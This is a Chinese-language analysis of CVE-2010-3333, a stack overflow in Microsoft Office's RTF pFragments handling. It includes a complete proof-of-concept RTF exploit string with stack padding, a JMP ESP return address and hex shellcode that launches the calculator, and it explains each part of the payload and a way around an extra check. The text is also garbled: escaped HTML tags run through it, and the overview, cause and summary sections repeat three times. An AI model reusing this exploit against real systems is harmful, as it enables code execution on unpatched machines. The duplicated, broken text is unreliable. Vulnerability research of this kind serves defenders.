CVE-2010-3333 Microsoft Office RTF栈溢出漏洞分析<\/h1>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2010-3333
漏洞类型<\/strong>: 栈溢出漏洞
影响组件<\/strong>: MSO.DLL在处理pFragments数组时未校验复制长度
攻击方式<\/strong>: 构造特殊RTF文档触发漏洞，实现任意代码执行<\/p>

受影响版本<\/h3>

Microsoft Office XP SP3<\/li>
Office 2003 SP3<\/li>
Office 2007 SP2<\/li>
Office 2010<\/li>
Office 2004和2008 for Mac<\/li>
Office for Mac 2011<\/li> <\/ul>
漏洞分析环境<\/h2>

操作系统<\/strong>: Windows XP SP3<\/li>
Word版本<\/strong>: 11.0.5604.0<\/li>
MSO.DLL版本<\/strong>: 11.0.5606.0<\/li>
调试工具<\/strong>: WinDbg, IDA Pro<\/li> <\/ul>
漏洞详细分析<\/h2>
漏洞成因<\/h3>
MSO.DLL在处理pFragments数组时未对复制长度进行校验，导致可以构造恶意数据造成栈溢出，从而劫持程序执行流程。<\/p>
关键函数调用链<\/h3>

崩溃点位于0x30E9EB88<\/code>，EDI指向只读内存区域<\/li>
回溯调用栈发现关键函数sub_30F4CC93<\/code><\/li>
sub_30F4CC5D<\/code>中的局部变量距离返回地址仅0x14字节<\/li>
sub_30E9EB62<\/code>在执行复制操作前未检查长度参数<\/li> <\/ol> 参数传递分析<\/h3> 参数1<\/strong>: 通过sub_30D2810C<\/code>返回值确定<\/li> 参数2<\/strong>: ebp-10h<\/code>指向的局部变量<\/li> 参数3<\/strong>: 固定值0<\/li> <\/ol> 复制长度计算<\/h3> 通过WinDbg调试发现：<\/p> 复制长度由RTF文档中的特定字段控制<\/li> 源数据位置由ESI寄存器指向的内存区域决定<\/li> <\/ol> 漏洞利用构造<\/h2> RTF文档结构<\/h3> 基本RTF文档结构如下：<\/p> {\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1;12345678}}}}} <\/code><\/pre> 关键字段说明<\/h3> pFragments<\/code>: 漏洞触发的关键属性名<\/li> sv<\/code>值格式: 1;1;payload_data<\/code> 第一个"1"控制是否调用Ordinal501<\/code><\/li> 第二个"1"可能与长度相关<\/li> 后续为实际payload数据<\/li> <\/ul> <\/li> <\/ol> 完整POC结构<\/h3> {\rtf1{\shp{\*\shpinst{\sp{\sn pfragments}{\sv 1;1;1234567801016161616162626262636363636464646465656565904dc57dAABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD33c050b82e646c6c50b8656c333250b86b65726e508bc450b87b1d807cffd033c050b82e65786550b863616c63508bc46a0550b8ad23867cffd033c050b8faca817cffd0}}}}} <\/code><\/pre> Payload组成<\/h3> 填充数据<\/strong>: "12345678"等用于填充栈空间<\/li> 长度控制<\/strong>: "0101"控制复制长度<\/li> 栈填充<\/strong>: "6161616162626262636363636464646465656565"等用于精确控制栈布局<\/li> 跳转地址<\/strong>: "904dc57d"是JMP ESP指令地址<\/li> Shellcode<\/strong>: 使用小写字母形式写入<\/li> 示例为弹计算器的Shellcode: 33<\/span>c050b82e646c6c50b8656c333250b86b65726e508bc450b87b1d807cffd033c050b82e65786550b863616c63508bc46a0550b8ad23867cffd033c050b8faca817cffd0<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 特殊处理<\/h3> 大写字母处理<\/strong>: RTF处理器会将payload中的大写字母替换为0 利用这一特性将"AABBCCDD"等数据转换为全零<\/li> 避免触发sub_30F4CE43<\/code>的额外检查<\/li> <\/ul> <\/li> <\/ol> 调试技巧<\/h2> 在VirtualAlloc<\/code>处设置断点，捕获内存分配过程<\/li> 在关键地址0x14D158C<\/code>设置内存访问断点<\/li> 跟踪Ordinal501<\/code>函数对内存的修改<\/li> <\/ol> 漏洞修复建议<\/h2> 对pFragments<\/code>属性的值进行严格长度校验<\/li> 更新到微软发布的安全补丁<\/li> 禁用不必要的RTF文档处理功能<\/li> <\/ol> 参考文档<\/h2> Microsoft Office Word 2003 RTF Specification<\/li> 微软安全公告MS10-087<\/li> <\/ul> 总结<\/h2> CVE-2010-3333是一个典型的栈溢出漏洞，通过精心构造的RTF文档可以绕过长度检查，实现任意代码执行。漏洞利用的关键在于精确控制复制长度和栈布局，同时利用RTF处理器的特性绕过额外的安全检查。<\/p>

CVE-2010-3333 Microsoft Office RTF栈溢出漏洞分析<\/h1>

漏洞概述<\/h2> 漏洞编号<\/strong>: CVE-2010-3333 漏洞类型<\/strong>: 栈溢出漏洞 影响组件<\/strong>: MSO.DLL在处理pFragments数组时未校验复制长度 攻击方式<\/strong>: 构造特殊RTF文档触发漏洞，实现任意代码执行<\/p>

漏洞详细分析<\/h2>

漏洞成因<\/h3> MSO.DLL在处理pFragments数组时未对复制长度进行校验，导致可以构造恶意数据造成栈溢出，从而劫持程序执行流程。<\/p>

漏洞利用构造<\/h2>

总结<\/h2> CVE-2010-3333是一个典型的栈溢出漏洞，通过精心构造的RTF文档可以绕过长度检查，实现任意代码执行。漏洞利用的关键在于精确控制复制长度和栈布局，同时利用RTF处理器的特性绕过额外的安全检查。<\/p>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2010-3333
漏洞类型<\/strong>: 栈溢出漏洞
影响组件<\/strong>: MSO.DLL在处理pFragments数组时未校验复制长度
攻击方式<\/strong>: 构造特殊RTF文档触发漏洞，实现任意代码执行<\/p>

漏洞成因<\/h3>
MSO.DLL在处理pFragments数组时未对复制长度进行校验，导致可以构造恶意数据造成栈溢出，从而劫持程序执行流程。<\/p>

总结<\/h2>
CVE-2010-3333是一个典型的栈溢出漏洞，通过精心构造的RTF文档可以绕过长度检查，实现任意代码执行。漏洞利用的关键在于精确控制复制长度和栈布局，同时利用RTF处理器的特性绕过额外的安全检查。<\/p>